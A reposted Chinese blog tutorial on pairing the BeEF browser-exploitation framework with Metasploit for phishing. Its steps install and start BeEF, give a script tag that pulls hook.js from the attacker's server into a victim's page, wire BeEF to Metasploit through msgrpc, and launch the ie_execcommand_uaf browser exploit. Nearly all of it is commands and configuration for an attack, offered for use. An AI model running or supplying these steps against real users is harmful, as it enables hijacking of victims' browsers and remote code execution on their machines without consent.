码迷,mamicode.com
首页 > 其他好文 > 详细

beef结合msf钓鱼

时间:2015-03-18 06:42:11      阅读:187      评论:0      收藏:0      [点我收藏+]

标签:配置文件   custom   enable   linux   false   

Kali linux 系统默认未安装beef,需要自行安装

1
2
apt-get update
apt-get install beef-xss

启动/usr/share/beef-xss

1
2
cd /usr/share/beef-xss
./beef

账号密码

127.0.0.1:3000/ui/pannel

beef/beef

  嵌入代码

<script src="Ip:3000/hook.js">

与Metasploit联动

Beef配置文件

/usr/share/beef-xss/config.yaml  

1
2
  metasploit:
enablefalse

改成

1
2
metasploit:
enabletrue


vim /usr/share/beef-xss/extensions/metasploit/config.yaml

原:

1
{os: ‘custom‘, path: ‘‘}

修改成

1
{os: ‘custom‘, path: ‘/usr/share/metasploit-framework/‘}

修改 host callback_host两参数,改为beef主机IP


重启postgresq、metasploit、服务

1
service postgresql restart & service metasploit restart

msfconsole #启动Metasploit
1
load msgrpc ServerHost=IP Pass=abc123

MSF设置:
use exploit/windows/browser/ie_execcommand_uaf
show options
set srvhost IP
exploit/run






本文出自 “我的世界,我就是导演。” 博客,请务必保留此出处http://biock.blog.51cto.com/4643304/1621565

beef结合msf钓鱼

标签:配置文件   custom   enable   linux   false   

原文地址:http://biock.blog.51cto.com/4643304/1621565

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!